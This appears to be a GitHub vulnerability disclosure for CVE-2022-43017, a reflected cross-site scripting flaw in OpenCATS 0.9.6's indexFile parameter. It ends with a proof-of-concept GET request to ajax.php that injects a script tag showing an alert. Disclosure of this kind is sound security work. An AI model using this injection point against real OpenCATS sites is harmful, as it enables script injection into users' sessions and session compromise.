Headline
CVE-2022-43017: opencats_zero-days/XSS_in_indexFile.md at main · hansmach1ne/opencats_zero-days
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component.
Permalink
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
Go to file
Copy path
Copy permalink
1 contributor
Users who have contributed to this file
Cross Site Scripting vulnerability in the OpenCats 'indexFile’.
OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.
PoC
GET //ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)"></a><script>alert`xss`</script>&isPopup=0